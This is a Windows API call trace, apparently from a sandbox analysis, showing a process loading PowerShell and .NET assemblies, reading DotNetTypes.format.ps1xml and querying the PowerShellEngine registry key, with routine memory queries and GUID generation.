	[0410.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0410.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0410.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0410.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0410.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0410.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0410.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0410.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0410.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0410.814] VirtualQuery (in: lpAddress=0x20bc80, lpBuffer=0x20cb40, dwLength=0x30 | out: lpBuffer=0x20cb40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0410.815] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x4411a345, Data2=0x6f45, Data3=0x449f, Data4=([0]=0x94, [1]=0x6d, [2]=0xfa, [3]=0xd0, [4]=0x99, [5]=0xd2, [6]=0xe6, [7]=0xbc))) returned 0x0
	[0410.816] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xfe91a557, Data2=0x248b, Data3=0x40aa, Data4=([0]=0xbf, [1]=0x7e, [2]=0xa5, [3]=0x2f, [4]=0x63, [5]=0xd5, [6]=0xe5, [7]=0xaf))) returned 0x0
	[0410.817] VirtualQuery (in: lpAddress=0x20be30, lpBuffer=0x20ccf0, dwLength=0x30 | out: lpBuffer=0x20ccf0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0410.818] VirtualQuery (in: lpAddress=0x20be30, lpBuffer=0x20ccf0, dwLength=0x30 | out: lpBuffer=0x20ccf0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0410.819] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xb50dd96c, Data2=0xd853, Data3=0x433b, Data4=([0]=0x98, [1]=0x7d, [2]=0x6e, [3]=0x50, [4]=0xf6, [5]=0xa8, [6]=0x46, [7]=0x2d))) returned 0x0
	[0410.822] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x33dbf1a9, Data2=0x9184, Data3=0x4f10, Data4=([0]=0xa9, [1]=0xa2, [2]=0x3, [3]=0x63, [4]=0xf, [5]=0x9f, [6]=0xb5, [7]=0xd6))) returned 0x0
	[0410.822] VirtualQuery (in: lpAddress=0x20c080, lpBuffer=0x20cf40, dwLength=0x30 | out: lpBuffer=0x20cf40*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0410.823] VirtualQuery (in: lpAddress=0x20bdc0, lpBuffer=0x20cc80, dwLength=0x30 | out: lpBuffer=0x20cc80*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0410.824] VirtualQuery (in: lpAddress=0x20bdc0, lpBuffer=0x20cc80, dwLength=0x30 | out: lpBuffer=0x20cc80*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0410.824] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x2ce9567c, Data2=0x4d8d, Data3=0x4b2c, Data4=([0]=0x85, [1]=0x51, [2]=0x6a, [3]=0x8c, [4]=0xd4, [5]=0x21, [6]=0xea, [7]=0x3))) returned 0x0
	[0410.824] VirtualQuery (in: lpAddress=0x20c080, lpBuffer=0x20cf40, dwLength=0x30 | out: lpBuffer=0x20cf40*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0410.824] VirtualQuery (in: lpAddress=0x20bea0, lpBuffer=0x20cd60, dwLength=0x30 | out: lpBuffer=0x20cd60*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0410.824] VirtualQuery (in: lpAddress=0x20b6f0, lpBuffer=0x20c5b0, dwLength=0x30 | out: lpBuffer=0x20c5b0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0410.825] VirtualQuery (in: lpAddress=0x20b6f0, lpBuffer=0x20c5b0, dwLength=0x30 | out: lpBuffer=0x20c5b0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0410.825] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x2b38bcd, Data2=0xfc49, Data3=0x48f1, Data4=([0]=0x8d, [1]=0xfc, [2]=0x65, [3]=0x40, [4]=0xff, [5]=0x49, [6]=0x4b, [7]=0x1e))) returned 0x0
	[0410.825] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xd9ac937c, Data2=0xb314, Data3=0x4dad, Data4=([0]=0xae, [1]=0x8b, [2]=0x6f, [3]=0x36, [4]=0x8f, [5]=0x15, [6]=0xb7, [7]=0x23))) returned 0x0
	[0410.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0410.825] SetErrorMode (uMode=0x1) returned 0x1
	[0410.825] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0410.826] GetFileType (hFile=0x2fc) returned 0x1
	[0410.826] SetErrorMode (uMode=0x1) returned 0x1
	[0410.826] GetFileType (hFile=0x2fc) returned 0x1
	[0410.826] ReadFile (in: hFile=0x2fc, lpBuffer=0x363a518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x363a518*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0410.828] ReadFile (in: hFile=0x2fc, lpBuffer=0x363a518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x363a518*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0410.828] ReadFile (in: hFile=0x2fc, lpBuffer=0x363a518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x363a518*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0410.828] ReadFile (in: hFile=0x2fc, lpBuffer=0x363a518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x363a518*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.237] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb5ef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x2eb5ef0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.237] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb5ef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x2eb5ef0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.237] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb5ef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x2eb5ef0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.237] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb5ef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x2eb5ef0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.238] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb5ef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x2eb5ef0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.238] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb5ef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x2eb5ef0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.238] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb5ef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x2eb5ef0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.238] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb5ef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x2eb5ef0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.239] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb5ef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x2eb5ef0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.239] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb5ef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x2eb5ef0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.239] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb5ef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x2eb5ef0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.239] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb5ef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x2eb5ef0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.240] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb5ef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x2eb5ef0*, lpNumberOfBytesRead=0x20d158*=0x1000, lpOverlapped=0x0) returned 1
	[0411.240] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb5ef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x2eb5ef0*, lpNumberOfBytesRead=0x20d158*=0xbce, lpOverlapped=0x0) returned 1
	[0411.240] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb5e7e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x2eb5e7e*, lpNumberOfBytesRead=0x20d158*=0x0, lpOverlapped=0x0) returned 1
	[0411.240] ReadFile (in: hFile=0x2fc, lpBuffer=0x2eb5ef0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d158, lpOverlapped=0x0 | out: lpBuffer=0x2eb5ef0*, lpNumberOfBytesRead=0x20d158*=0x0, lpOverlapped=0x0) returned 1
	[0411.241] CloseHandle (hObject=0x2fc) returned 1
	[0411.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0411.241] SetErrorMode (uMode=0x1) returned 0x1
	[0411.241] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d100 | out: lpFileInformation=0x20d100*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0411.241] SetErrorMode (uMode=0x1) returned 0x1
	[0411.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0411.241] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d1e8 | out: phkResult=0x20d1e8*=0x2fc) returned 0x0
	[0411.241] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d16c, lpData=0x0, lpcbData=0x20d168*=0x0 | out: lpType=0x20d16c*=0x1, lpData=0x0, lpcbData=0x20d168*=0x56) returned 0x0
	[0411.241] CoTaskMemAlloc (cb=0x5a) returned 0x3ba940
	[0411.241] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d13c, lpData=0x3ba940, lpcbData=0x20d138*=0x56 | out: lpType=0x20d13c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d138*=0x56) returned 0x0
	[0411.241] CoTaskMemFree (pv=0x3ba940) 
	[0411.242] RegCloseKey (hKey=0x2fc) returned 0x0
	[0411.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0411.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0411.242] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xc843e88b, Data2=0x1949, Data3=0x4951, Data4=([0]=0xb4, [1]=0x48, [2]=0xa5, [3]=0x46, [4]=0xf5, [5]=0x3e, [6]=0x43, [7]=0x37))) returned 0x0
	[0411.243] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x3445392, Data2=0xea16, Data3=0x4400, Data4=([0]=0x85, [1]=0xca, [2]=0x60, [3]=0x8a, [4]=0x3, [5]=0x5, [6]=0xf5, [7]=0x9e))) returned 0x0
	[0411.244] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x26d39d38, Data2=0x91f8, Data3=0x4c44, Data4=([0]=0xaf, [1]=0x4f, [2]=0xb3, [3]=0x26, [4]=0x7c, [5]=0x3b, [6]=0xd1, [7]=0x1d))) returned 0x0
	[0411.244] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x4ef398fa, Data2=0x61ec, Data3=0x4039, Data4=([0]=0x89, [1]=0x62, [2]=0xa9, [3]=0xb, [4]=0x1c, [5]=0x5e, [6]=0x2e, [7]=0x3c))) returned 0x0
	[0411.244] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xfdc19f80, Data2=0x5e1d, Data3=0x4b7c, Data4=([0]=0x9f, [1]=0x10, [2]=0x81, [3]=0x36, [4]=0xe7, [5]=0xff, [6]=0x8, [7]=0x6c))) returned 0x0
	[0411.245] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x2372a97c, Data2=0x2e8a, Data3=0x4a04, Data4=([0]=0x88, [1]=0x7b, [2]=0xf, [3]=0xcb, [4]=0x74, [5]=0xbd, [6]=0x5c, [7]=0x91))) returned 0x0
	[0411.245] VirtualQuery (in: lpAddress=0x20bdc0, lpBuffer=0x20cc80, dwLength=0x30 | out: lpBuffer=0x20cc80*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.246] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xdfd0150a, Data2=0xfd61, Data3=0x4f55, Data4=([0]=0x89, [1]=0xb0, [2]=0xdb, [3]=0xe8, [4]=0x9b, [5]=0x5, [6]=0xf2, [7]=0x24))) returned 0x0
	[0411.246] VirtualQuery (in: lpAddress=0x20bdc0, lpBuffer=0x20cc80, dwLength=0x30 | out: lpBuffer=0x20cc80*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.247] VirtualQuery (in: lpAddress=0x20bdc0, lpBuffer=0x20cc80, dwLength=0x30 | out: lpBuffer=0x20cc80*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.248] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x48a326e5, Data2=0xeaf7, Data3=0x4cc0, Data4=([0]=0x81, [1]=0x98, [2]=0x78, [3]=0xb1, [4]=0xd5, [5]=0x69, [6]=0xb9, [7]=0x35))) returned 0x0
	[0411.248] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xcbc415f2, Data2=0x572b, Data3=0x4a22, Data4=([0]=0xb2, [1]=0xb3, [2]=0x7c, [3]=0xdf, [4]=0xe7, [5]=0x72, [6]=0x67, [7]=0x89))) returned 0x0
	[0411.248] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x6f98215c, Data2=0xbe07, Data3=0x4a41, Data4=([0]=0xa6, [1]=0xe8, [2]=0xd4, [3]=0x9a, [4]=0x30, [5]=0x39, [6]=0xfe, [7]=0x8e))) returned 0x0
	[0411.248] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x323edb14, Data2=0xe442, Data3=0x443c, Data4=([0]=0xa2, [1]=0xac, [2]=0xd6, [3]=0x86, [4]=0x15, [5]=0xf, [6]=0xd4, [7]=0x9))) returned 0x0
	[0411.248] VirtualQuery (in: lpAddress=0x20bdc0, lpBuffer=0x20cc80, dwLength=0x30 | out: lpBuffer=0x20cc80*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.248] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x4d4e80e9, Data2=0x98ee, Data3=0x4c93, Data4=([0]=0x86, [1]=0xc8, [2]=0x67, [3]=0xd9, [4]=0xae, [5]=0xa7, [6]=0x5d, [7]=0x70))) returned 0x0
	[0411.248] VirtualQuery (in: lpAddress=0x20bdc0, lpBuffer=0x20cc80, dwLength=0x30 | out: lpBuffer=0x20cc80*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.248] VirtualQuery (in: lpAddress=0x20bdc0, lpBuffer=0x20cc80, dwLength=0x30 | out: lpBuffer=0x20cc80*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.248] VirtualQuery (in: lpAddress=0x20bdc0, lpBuffer=0x20cc80, dwLength=0x30 | out: lpBuffer=0x20cc80*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.249] VirtualQuery (in: lpAddress=0x20bdc0, lpBuffer=0x20cc80, dwLength=0x30 | out: lpBuffer=0x20cc80*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.249] VirtualQuery (in: lpAddress=0x20bdc0, lpBuffer=0x20cc80, dwLength=0x30 | out: lpBuffer=0x20cc80*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.249] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xb101821f, Data2=0x3bd5, Data3=0x4546, Data4=([0]=0xba, [1]=0x61, [2]=0x19, [3]=0xc0, [4]=0xf5, [5]=0xcd, [6]=0x51, [7]=0xd7))) returned 0x0
	[0411.249] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x64703774, Data2=0xfa12, Data3=0x4881, Data4=([0]=0xa0, [1]=0xbc, [2]=0xcc, [3]=0x7b, [4]=0xaf, [5]=0x6e, [6]=0xf9, [7]=0x3d))) returned 0x0
	[0411.249] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x46695adb, Data2=0x5c90, Data3=0x41c5, Data4=([0]=0xb0, [1]=0x1c, [2]=0x71, [3]=0x45, [4]=0x85, [5]=0x73, [6]=0xc2, [7]=0x45))) returned 0x0
	[0411.249] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x9779c336, Data2=0x4bc0, Data3=0x47af, Data4=([0]=0xa2, [1]=0x99, [2]=0xdd, [3]=0x0, [4]=0x68, [5]=0xb6, [6]=0xaf, [7]=0x2d))) returned 0x0
	[0411.249] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x110c3de5, Data2=0xce50, Data3=0x472b, Data4=([0]=0x8d, [1]=0xfb, [2]=0xf3, [3]=0x79, [4]=0x33, [5]=0x77, [6]=0xbb, [7]=0x71))) returned 0x0
	[0411.249] VirtualQuery (in: lpAddress=0x20c080, lpBuffer=0x20cf40, dwLength=0x30 | out: lpBuffer=0x20cf40*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0411.249] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x98619fcd, Data2=0xcc02, Data3=0x4080, Data4=([0]=0x83, [1]=0xa8, [2]=0x9c, [3]=0x20, [4]=0x5e, [5]=0xa1, [6]=0x56, [7]=0xef))) returned 0x0
	[0411.249] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x1938d7f4, Data2=0x88b1, Data3=0x4ac0, Data4=([0]=0x8b, [1]=0xe9, [2]=0xf3, [3]=0xea, [4]=0x9a, [5]=0x41, [6]=0x61, [7]=0xf5))) returned 0x0
	[0411.250] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xf98e0f4f, Data2=0x53e7, Data3=0x4140, Data4=([0]=0xb7, [1]=0xd7, [2]=0x75, [3]=0x47, [4]=0x30, [5]=0x5c, [6]=0x8c, [7]=0xb6))) returned 0x0
